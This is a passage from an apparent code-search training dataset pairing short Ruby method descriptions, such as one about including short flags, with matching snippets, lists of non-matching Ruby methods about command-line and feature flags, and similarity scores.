"def lookup(glob, flags=0)\n pwd = File.expand_path(Dir.pwd)\n home = File.expand_path('~')\n while pwd != '/' && pwd != home\n paths = Dir.glob(File.join(pwd, glob), flags)\n return paths unless paths.empty?\n break if ROOT_INDICATORS.any?{ |r| File.exist?(File.join(pwd, r)) }\n pwd = File.dirname(pwd)\n end\n return []\n end",
"def bitmask(int)\n return int.to_s(2).reverse.split('')\n end",
"def includedirs\n res = []\n @flags.each { |f| res.push f if f =~ /^-I/ }\n res.join \" \"\n end",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def join(seperator = \" | \")\n\t\tflags.map { |flag| flag.name }.join(seperator)\n\tend",
"def begins_with_r(array)\n array.all? {|word| word.start_with?(\"r\")}\nend",
"def flags(path)\n info = file_info(path)[1]\n return \"\" if info.nil?\n info\n end",
"def feature_flags_for(*flag_names)\n flag_names.map { |flag_name| feature_flag_as_hash(flag_name) }.reduce({}, :merge).with_indifferent_access\n end",
"def all_names(format)\n alts = alternates.select { |a| a.include? format }.flatten\n alts.any? ? alts : [format]\n end",
"def names\n fs = []\n %w( COARSE_GRAIN_BUFFER FINE_GRAIN_BUFFER FINE_GRAIN_SYSTEM ATOMICS ).each { |f|\n fs.push(f) if self.include?( self.class.const_get(f) )\n }\n return fs\n end",
"def available_go_cabs\n arr = []\n @go_cabs.select { |cab| arr << cab if (cab.available == true) }\n return arr\n end",
"def matches( input )\n matches = Array.new\n\n input.shorter.each_with_index do |char, idx|\n input.window_range( idx ).each do |widx|\n if input.longer[widx] == char then\n matches << widx\n break\n end\n end\n end\n\n return matches\n end",
"def flag_for(tag)\n return @flags.detect { |flag| flag.tag == tag}\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def all_flags\n res = get_request 'features'\n if res.status == 200\n JSON.parse(res.body, symbolize_names: true)\n else\n @config.logger.error(\"[LDClient] Unexpected status code #{res.status}\")\n {}\n end\n end",
"def get_all_strings\n return @stringpool_main.values\n end",
"def strings_for_select( *_array)\n _array = _array.flatten\n if _array.blank?\n []\n else\n _array.zip _array\n end\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def patterns\n #@rules.every.pattern\n @rules.map {|r| r.pattern }\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def file_patterns\n [@file_patterns].flatten.compact.uniq\n end",
"def begins_with_r(array)\n array.all? { |word| word.start_with?(\"r\") }\nend",
"def flag_hash\n flags.to_s.split(\", \").each_with_object({}) do |flag, hash|\n k, v = flag.split(\"=\")\n hash[k] = v\n end\n end",
"def get_patterns\n patterns = BASE_PATTERNS\n # add the colour keywords. generate these from the colour wheel's constants\n colours = Yay::ColourWheel::all_names.join('|')\n patterns.unshift [:colour, Regexp.new(\"\\\\b(#{colours})\\\\b\", Regexp::IGNORECASE)]\n return patterns\n end",
"def begins_with_r(tools)\n result = nil\n tools.each {|tool| result = tool.start_with?(\"r\")}\n result\nend",
"def state_match\n states = %w(mn ak hi id mt wy ut nm tx ks \n ok nb sd nd ia ar la ms ab wi\n tn ky in oh pn wv md va nc sc\n ga de nj ct ri ma vt nh ma il\n ca co az nv fl mi ny or wa mo)\n eval states.map {|x| \"stri('#{x}')\"}.join(' | ')\n end",
"def command_keywords\n dir_path = File.dirname(__FILE__)\n dirs = Dir.entries(dir_path)\n command_file_names = dirs.select{ |x| x.start_with?('_')}\n command_file_names.collect {|x| x.sub(/^_/, '')}\nend",
"def build_character_array(character_bytes, character)\n character_bytes\n .select { |sub_array| sub_array.include?(character) }\n .flatten\nend"
] | [
"0.7122982",
"0.7122982",
"0.6619203",
"0.649433",
"0.60035",
"0.60031104",
"0.59638727",
"0.59401083",
"0.5879179",
"0.5834999",
"0.580956",
"0.5784173",
"0.5769756",
"0.5763876",
"0.5746046",
"0.56907606",
"0.56907606",
"0.5672787",
"0.56592214",
"0.5626698",
"0.5591124",
"0.5549991",
"0.5524209",
"0.55039483",
"0.5495406",
"0.54867506",
"0.5451067",
"0.54295194",
"0.54088753",
"0.53739744",
"0.5363532",
"0.53371966",
"0.53200734",
"0.5305586",
"0.5283986",
"0.52736497",
"0.5270734",
"0.5260065",
"0.5250012",
"0.5242983",
"0.5226725",
"0.52179366",
"0.5204357",
"0.51642823",
"0.5158985",
"0.513026",
"0.5115764",
"0.51079744",
"0.510431",
"0.5100178",
"0.5084337",
"0.5057118",
"0.50567216",
"0.5049098",
"0.5046512",
"0.50395006",
"0.5036575",
"0.5033242",
"0.5028547",
"0.50023943",
"0.49975964",
"0.4988271",
"0.4988093",
"0.4971955",
"0.49712822",
"0.49604568",
"0.4959473",
"0.49590153",
"0.49517447",
"0.4951206",
"0.49416655",
"0.49401066",
"0.49286765",
"0.49253574",
"0.49024814",
"0.48982137",
"0.489774",
"0.48950702",
"0.48946834",
"0.4891862",
"0.48862574",
"0.48846394",
"0.48811918",
"0.48810583",
"0.48794392",
"0.48788488",
"0.48788488",
"0.48787722",
"0.48755",
"0.4873967",
"0.48674232",
"0.48626506",
"0.48560634",
"0.48453435",
"0.4839437",
"0.4837345",
"0.48355174",
"0.48338112",
"0.4830821",
"0.4821484"
] | 0.7852811 | 0 |
Whether to include short flags | def include_short?
@include_short
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def flags\n [long, short].compact\n end",
"def short\n @short\n end",
"def short?\n !(@short.nil? || @short.empty?)\n end",
"def short; end",
"def flags\n [long, negative_long, short].compact\n end",
"def test_short\n LinuxFortune.short = true\n assert LinuxFortune.short # short should be set to true\n assert LinuxFortune.long == false # long to false\n assert LinuxFortune.fortune_options.include?(\"-s\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 10.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n assert lf.body.size*0.9 < LinuxFortune.short_length # check if actual size is less than the max. short length\n end\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def include_long?\n @include_long\n end",
"def format_boolean_flag(flag, small=false)\n css_small = small == true ? 'boolean-flag-xs' : ''\n if flag == true\n return \"<div class='boolean-flag boolean-flag-true #{css_small}'>#{t('shared.common.yes')}</div>\".html_safe\n else\n return \"<div class='boolean-flag boolean-flag-false #{css_small}'>#{t('shared.common.no')}</div>\".html_safe\n end\n end",
"def short(options = T.unsafe(nil)); end",
"def short(*shorts)\n format = ( little_endian? ? 'v*' : 'n*') \n return string(shorts.pack(format)) \n end",
"def get_new_short?\n return self.new_short?\n end",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def flags; end",
"def shortlist?\n !shortlist_complete\n end",
"def read_short(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n val |= read_byte(signed) << 8\n val |= read_byte(signed, mut)\n when :LITTLE\n val |= read_byte(signed, mut)\n val |= read_byte(signed) << 8\n end\n val\n end",
"def server_flags; end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def show_style\n :short\n end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def fast?\n settings['fast']\n end",
"def flags?\n !@flags.empty?\n end",
"def short\n Util.from_bytes :short, value\n end",
"def suitable?(short = true)\n return(short ? confine_collection.valid? : confine_collection.summary)\n end",
"def short_form!\n options[:form] = 'short'\n self\n end",
"def complete_flags?\n @complete_flags\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def short_binary_type; end",
"def has_flag(u, f)\n ret = false\n @opers.each do |oper|\n if oper.can_access(u)\n puts(\"flags: #{oper.flags}\") if $config.options['debug']\n ret = oper.flags.include?(f) || oper.flags.include?('*')\n end\n end\n\n if !ret && $config.options['levels'] && (u.isoper || u.isadmin)\n puts(\"lflags: #{$config.levels[u.olevel]}\")\n ret = $config.levels[u.olevel].include?(f)\n end\n \n return ret\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def shortened\n @shortened ||= shorten\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def apphelp_boolean( bool )\n apphelp_generic( bool ? :yes : :no )\n end",
"def create_sound_get_flags(flags)\n return (flags | FMOD::MODE::OPENMEMORY | FMOD::MODE::CREATESTREAM) if flags\n return (FMOD::MODE::LOOP_NORMAL | FMOD::MODE::FMOD_2D | FMOD::MODE::OPENMEMORY | FMOD::MODE::CREATESTREAM)\n end",
"def full full\n @options[:full] = booleanize 'Full', full\n self\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def write_short(file, short, md)\n short = [short].pack('n')\n md << short\n file.write(short)\n end",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def feature_flags\n 0\n end",
"def shorts cols\n decode_values :short, cols, true\n end",
"def set_short(pos=nil,s=nil)\n if pos.class == Fixnum && s.class == Fixnum && !block_given?\n @j_del.java_method(:setShort, [Java::int.java_class,Java::short.java_class]).call(pos,::Vertx::Util::Utils.to_short(s))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling set_short(pos,s)\"\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def short\n quality + number.to_s \n end",
"def show_onoff(bool)\n if not [TrueClass, FalseClass, NilClass].member?(bool.class)\n return \"??\"\n end\n return bool ? 'on' : 'off'\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def shortenable?(command)\n @alias_hash.each_pair do |alias_, real|\n if used_subcommand?(command, real)\n return true if real.length > alias_.length\n end\n end\n false\n end",
"def flag; end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def tiny\n shorten(4)\n end",
"def flag\n flags.join(\", \")\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def verbose?() @opts.verbose?; end",
"def stability_flags\n alias_of.stability_flags\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def short\n shorten(8)\n end",
"def true_offset\n offset_flags >> 16\n end",
"def debug_request(flag='on', *_)\n case flag.downcase\n when \"off\", \"false\", \"0\", \"nil\"\n @debug = false\n else\n @debug = true\n end\n end",
"def short=(value)\n raise ArgumentError, _(\"Short names can only be one character.\") if value.to_s.length != 1\n @short = value.to_s\n end",
"def has_opts?\n header_len > 20\n end",
"def write_raw_short(val)\n buffer << [val].pack(\"S>\")\n end",
"def group_entry?\n flags.include? :g\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def underscore_flags?\n config[:underscore_flags]\n end",
"def expandable?\n options[:expandable]\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def append_short(s=nil)\n if s.class == Fixnum && !block_given?\n @j_del.java_method(:appendShort, [Java::short.java_class]).call(::Vertx::Util::Utils.to_short(s))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling append_short(s)\"\n end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def single?\n mode == 'single'\n end",
"def verbose?\n !!ENV[\"DEBUG\"]\nend",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def is_flagged?\n return self.flags.unresolved.count > 0\n end",
"def convert_smallint_to_bool\n opts.has_key?(:convert_smallint_to_bool) ? opts[:convert_smallint_to_bool] : db.convert_smallint_to_bool\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def bool_on(word, description = \"\")\n Options[word.to_sym] = false\n on \"-#{word.chars.first}\", \"--[no]#{word}\", description do |o|\n Options[word.to_sym] == o\n end\n end",
"def is_a_short_code?(phone)\n !!phone.to_s.match(/\\A\\d{4,6}\\z/)\n end",
"def typecast_value_boolean(opts={});true;end",
"def active?\n !effective_flags.empty?\n end",
"def short\n # this are short words\n assert PorterStemmer::Porter2.short?(\"bed\")\n assert PorterStemmer::Porter2.short?(\"shed\")\n assert PorterStemmer::Porter2.short?(\"shred\")\n\n # this are not short words\n assert !PorterStemmer::Porter2.short?(\"bead\")\n assert !PorterStemmer::Porter2.short?(\"embed\")\n assert !PorterStemmer::Porter2.short?(\"beds\")\n end",
"def gp_flags; end",
"def get_short\n get(2).unpack('s')\n end",
"def show_full\n @show_full=true\n end",
"def flagged?(flag)\n self.flags.include? flag\n end",
"def shortname?\n !@shortname.nil?\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def is_verbose?\n options.include?(\"-v\")\n end",
"def clamp_short(value)\n mode = Rubinius::Type.coerce_to value, Integer, :to_int\n mode < 0 || mode > 0xffff ? 0 : mode\n end",
"def flags(flags)\n f = \"\"\n if (flags & Sigar::RTF_UP) != 0\n f += \"U\"\n end\n if (flags & Sigar::RTF_GATEWAY) != 0\n f += \"G\"\n end\n if (flags & Sigar::RTF_HOST) != 0\n f += \"H\"\n end\n f\n end",
"def is_elflags?(); @type == GRT_ELFLAGS; end"
] | [
"0.75528914",
"0.71379894",
"0.6998727",
"0.6910547",
"0.6707933",
"0.65746135",
"0.65517926",
"0.6400962",
"0.6104154",
"0.6086827",
"0.607279",
"0.60326034",
"0.60232764",
"0.6019786",
"0.5986978",
"0.5936265",
"0.5927495",
"0.5918958",
"0.58649856",
"0.58321273",
"0.5822369",
"0.58152264",
"0.5803365",
"0.57992584",
"0.5796362",
"0.5776559",
"0.5742714",
"0.57330406",
"0.5727529",
"0.5700044",
"0.5643883",
"0.5642863",
"0.5642863",
"0.56060475",
"0.56033105",
"0.55978864",
"0.55809385",
"0.55439687",
"0.55151916",
"0.5491736",
"0.54866123",
"0.5485344",
"0.54675305",
"0.5463739",
"0.5457115",
"0.5453219",
"0.5447242",
"0.5445686",
"0.54289764",
"0.5422473",
"0.54108757",
"0.54009676",
"0.538027",
"0.53783625",
"0.53713965",
"0.5364755",
"0.535992",
"0.5338828",
"0.53330445",
"0.5329455",
"0.5319651",
"0.5309489",
"0.53086025",
"0.5303656",
"0.52974486",
"0.52968365",
"0.5284759",
"0.52801704",
"0.5274998",
"0.5270863",
"0.52705336",
"0.52672476",
"0.52657175",
"0.5262347",
"0.5255767",
"0.52534884",
"0.5252093",
"0.5251049",
"0.52501327",
"0.5246568",
"0.5244637",
"0.5239361",
"0.5239032",
"0.523274",
"0.5231596",
"0.5230916",
"0.52302426",
"0.5229966",
"0.52196896",
"0.5216919",
"0.5209926",
"0.52040344",
"0.51966035",
"0.51924634",
"0.5178061",
"0.5176484",
"0.51666653",
"0.51633596",
"0.5159315",
"0.5158553"
] | 0.77422243 | 0 |
Whether to include long flags | def include_long?
@include_long
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n [long, short].compact\n end",
"def test_long\n LinuxFortune.long = true\n assert LinuxFortune.long # long should be set to short\n assert LinuxFortune.short == false # short to false\n assert LinuxFortune.fortune_options.include?(\"-l\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 5.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n #puts \"#{lf.body.size} characters\"\n # TODO apparently there is an issue with 'fortune -l'; check fortune docs & bugs (manual mentions a different problem\n assert lf.body.size*1.1 >= LinuxFortune.short_length # check if actual size is greater than the max. short length\n end\n end",
"def long_for_optparse\n (arg and not(long.nil?)) ? (\"%s %s\" % [long, arg]) : long\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def get_new_long?\n return self.new_long?\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def options\n [['--build32', 'Force a 32-bit build.']]\n end",
"def long_opt_symbol(args); end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def include_short?\n @include_short\n end",
"def flags; end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def test_short\n LinuxFortune.short = true\n assert LinuxFortune.short # short should be set to true\n assert LinuxFortune.long == false # long to false\n assert LinuxFortune.fortune_options.include?(\"-s\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 10.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n assert lf.body.size*0.9 < LinuxFortune.short_length # check if actual size is less than the max. short length\n end\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def default_flags\n ldflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n ldflags.push '-m64'\n ldflags.push '-R/usr/sfw/lib/amd64' if Platform.is_x86?\n end\n\n ldflags\n end",
"def complete_flags?\n @complete_flags\n end",
"def complain_about_bad_flags?\n @complain_about_bad_flags\n end",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def read_long(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n (BYTE_SIZE * 7).downto(0) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div : next }\n val |= read_byte(signed, mut)\n when :LITTLE\n (0).upto(BYTE_SIZE * 7) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div: next }\n val |= read_byte(signed, mut)\n end\n val\n end",
"def long_read_len= fixnum\n #This is a stub, used for indexing\n end",
"def is_elflags?(); @type == GRT_ELFLAGS; end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def read_long; end",
"def flags?\n !@flags.empty?\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def flag_more?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_MORE == TAC_PLUS_ACCT_FLAG_MORE)\n return(false)\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def add_flags(type, flags)\n case type\n when :c\n $CFLAGS << \" #{flags} \"\n when :ld\n $LDFLAGS << \" #{flags} \"\n end\nend",
"def add_flags(type, flags)\n case type\n when :c\n $CFLAGS << \" #{flags} \"\n when :ld\n $LDFLAGS << \" #{flags} \"\n end\nend",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def int64?\n type == INT64_TYPE\n end",
"def flag_more!\n if (!flag_more?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_MORE\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_MORE) \n end\n return(nil)\n end",
"def set_64_bit_offset(is_64_bit)\n raise ArgumentError.new, 'The value can only be true or false' unless [true, false].include?(is_64_bit)\n parameter_block.word_count = is_64_bit ? 0x0E : 0x0C\n end",
"def should_use_long_names?\n opts = get_options\n opts['uselongnames']\n end",
"def set_64_bit_offset(is_64_bit)\n raise ArgumentError.new, 'The value can only be true or false' unless [true, false].include?(is_64_bit)\n parameter_block.word_count = is_64_bit ? 0x0C : 0x0A\n end",
"def server_flags; end",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def flag\n flags.join(\", \")\n end",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def short(options = T.unsafe(nil)); end",
"def length_in_long_words\n return @bits.attr_length\n end",
"def flag _args\n \"flag _args;\" \n end",
"def write_long(*n); end",
"def complain_about_bad_flags!\n @complain_about_bad_flags = true\n end",
"def on long,short,desc,type=nil, &b\n t = gt = (type || :none)\n ((gt = \"#{t[0]}_array\") && t=t[0]) if type.is_a?(::Array)\n gt = :\"#{gt.upcase}\"\n \n @map[long] = {block: b, type: gt}\n\n application.add_main_option(long,short,GLib::OptionFlags::NONE,GLib::OptionArg.const_get(gt), desc, type ? t.to_s.upcase : nil) \n end",
"def flags \n @flags ||= {}\n end",
"def found_multiple?\n @flags.size > 1\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def write_long(file, long, md)\n long = [long].pack('q>')\n md << long\n file.write(long)\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def compute_ext_opts (opts)\n\n r = 0\n r = r | 1 if opts[:record_locking]\n r = r | 2 if opts[:global_locking]\n r\n end",
"def append_ld_flags(flags)\n flags = [flags] unless flags.is_a?(Array)\n with_ldflags(\"#{$LDFLAGS} #{flags.join(' ')}\") { true }\nend",
"def has_opts?\n header_len > 20\n end",
"def other_executable?(mode)\n mode & 00001 == 00001\n end",
"def other_readable?(mode)\n mode & 00004 == 00004\n end",
"def set_long(pos=nil,l=nil)\n if pos.class == Fixnum && l.class == Fixnum && !block_given?\n @j_del.java_method(:setLong, [Java::int.java_class,Java::long.java_class]).call(pos,l)\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling set_long(pos,l)\"\n end",
"def flags\n return @val\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def flags_before_args_enforced?\n @enforce_flags_before_args\n end",
"def check32_bit_on64_system\n return @check32_bit_on64_system\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def get_long\n get(4).unpack('l')\n end",
"def to_much?(options)\n options.number.to_i > 20\n end",
"def bson_int64?\n (MIN_64BIT <= self) && (self <= MAX_64BIT)\n end",
"def true_offset\n offset_flags >> 16\n end",
"def collect_build_args\n build_flags = []\n\n build_flags << \"--HEAD\" if HEAD?\n build_flags << \"--universal\" if build_universal?\n build_flags << \"--build-bottle\" if build_bottle?\n build_flags << \"--build-from-source\" if build_from_source?\n\n build_flags\n end",
"def very_long_pollution_sources_description?\n bathing_water&.long_pollution_description?(VERY_LONG_DESCRIPTION_LIMIT) &&\n show_prf?\n end",
"def build_flags_cross\n # Unclear if we need config_site CONFIG_SITE=/etc/dpkg-cross/cross-config.i386\n [] << '-a' << cross_arch\n end",
